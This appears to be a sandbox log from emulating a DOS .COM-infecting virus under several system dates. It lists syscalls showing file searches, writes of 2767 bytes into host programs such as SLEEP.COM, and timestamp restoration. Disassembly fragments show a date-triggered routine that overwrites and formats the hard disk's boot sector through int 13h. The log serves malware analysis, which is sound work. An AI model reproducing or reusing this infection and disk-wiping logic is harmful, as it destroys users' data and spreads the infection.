2018-12-25T11:52:05.472349661Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.474869191Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.481145644Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.490906723Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.493662137Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.496589646Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.502513761Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.513170044Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.519830617Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.521323509Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.528079942Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.54034104Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.542028558Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.545292868Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.551056045Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.561189592Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.567763313Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.569442203Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.575802424Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.586052061Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.588014143Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.590445625Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.60108457Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.61127861Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.617846495Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.619459717Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.626839005Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.634011578Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.635752274Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.639272908Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.644652665Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.656301997Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.668417284Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.669891482Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.676501289Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.686631421Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.688464437Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.691248395Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.698344558Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.707789525Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.714314392Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.716444922Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.722713689Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.735222207Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.737575491Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.740168668Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.752519381Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.762459378Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.771157586Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.772711294Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.778387606Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:05.779768454Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:05.782102276Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:05.784460252Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:05.786400371Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:05.793352516Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:05.795304708Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:05.803453808Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:05.80473612Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:05.807947487Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:05.809158402Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:05.810509618Z 62 PC: 1448c | Close file
2018-12-25T11:52:05.81849475Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:05.824618685Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.829085866Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.831225582Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.833453838Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:05.838624493Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:05.840247138Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:05.846488798Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:05.848088755Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:05.852607873Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:07.798175992Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:07.800287414Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:07.802547477Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:07.80464964Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:07.807384534Z 78 PC: 14390 | Find first file
2018-12-25T11:52:07.81384488Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:07.819756646Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:07.837432901Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:07.845091213Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:07.846547011Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:07.853576237Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:07.865809506Z 62 PC: 143b9 | Close file
2018-12-25T11:52:07.867685793Z 79 PC: 143bd | Find next file
2018-12-25T11:52:07.870538113Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:07.877699237Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:07.888606775Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:07.896660759Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:07.898617359Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:07.905645269Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:07.916806139Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:07.919227751Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:07.92242022Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:07.928627234Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:07.940115931Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:07.947785047Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:07.949443875Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:07.95718896Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:07.968344411Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:07.97038578Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:07.973583763Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:07.98251995Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:07.993383752Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.000635356Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.010422484Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.017225041Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.031783475Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.03430783Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.037124218Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.043384225Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.054729382Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.059951845Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.061547917Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.067370099Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.074591032Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.075934437Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.079202Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.087671379Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.098856099Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.106813955Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.108376905Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.115381149Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.126646065Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.129952969Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.133264035Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.139936385Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.152309995Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.160500308Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.161967434Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.169612917Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.178226735Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.179716667Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.183844465Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.189908057Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.200580865Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.205587183Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.207117513Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.213986978Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:08.21691793Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.220386448Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:08.221749797Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:08.223830071Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.231938239Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:08.233678834Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:08.243579323Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:08.245375041Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.248515701Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:08.250386101Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:08.252111432Z 62 PC: 1448c | Close file
2018-12-25T11:52:08.260489307Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:08.271236426Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.276646798Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.277800253Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.279403997Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:08.284333279Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:08.286112701Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:08.290396729Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:08.293328791Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:08.298511129Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":9,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:07.873594507Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:07.875227373Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:07.877470458Z 9 PC: 14310 | Display string (Could not find end pointer)
2018-12-25T11:52:08.024347674Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.028053251Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.030479402Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.037055005Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.044189915Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:08.062040979Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.069398169Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:08.071227133Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.083243571Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:08.094364284Z 62 PC: 143b9 | Close file
2018-12-25T11:52:08.095885687Z 79 PC: 143bd | Find next file
2018-12-25T11:52:08.100090376Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.106449303Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.117330862Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.125093572Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.126379098Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.133222073Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.145495608Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.147938398Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.150984871Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.158073641Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.178318248Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.186830703Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.190231025Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.197696025Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.209594015Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.212372174Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.21706361Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.222968114Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.231843755Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.245444027Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.246940997Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.254314571Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.269072616Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.272079448Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.275338482Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.282804059Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.29409253Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.298442605Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.30103119Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.31172254Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.32340646Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.327245712Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.331076692Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.338458505Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.36372952Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.374657737Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.376184447Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.383333797Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.395208699Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.397664826Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.40099065Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.409480523Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.420568813Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.428297925Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.431196446Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.440366382Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.451882791Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.45519937Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.458670963Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.465287555Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.476372409Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.485316667Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.487318222Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.496099119Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:08.499302862Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.504168694Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:08.506182711Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:08.508943874Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.516870922Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:08.519082164Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:08.530362649Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:08.532324654Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.535892146Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:08.537886727Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:08.540486665Z 62 PC: 1448c | Close file
2018-12-25T11:52:08.549345721Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:08.559926425Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.566096791Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.567733165Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.571475161Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:08.580509756Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:08.58793517Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:08.597652599Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:08.600729318Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:08.605397796Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":9,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:07.915793619Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:07.917280054Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:07.919201706Z 9 PC: 14310 | Display string (Could not find end pointer)
2018-12-25T11:52:08.039852546Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.042420918Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.044487815Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.050170149Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.05755749Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:08.074730253Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.080657952Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:08.082382895Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.088809106Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:08.0989265Z 62 PC: 143b9 | Close file
2018-12-25T11:52:08.105785931Z 79 PC: 143bd | Find next file
2018-12-25T11:52:08.108275983Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.113663812Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.123536883Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.129958298Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.131205988Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.138542713Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.148094081Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.149689657Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.152492374Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.157831897Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.167627427Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.173970737Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.175733818Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.185655299Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.195253526Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.197200764Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.199670738Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.205122552Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.2146295Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.225760616Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.227761801Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.234586982Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.244560923Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.246199573Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.248846127Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.254276635Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.274896517Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.289058329Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.29069808Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.297141342Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.309943482Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.311913621Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.316110258Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.322309111Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.332003592Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.338665389Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.341188284Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.347481489Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.358861537Z 62 PC: 143b9 | Close file (See above)
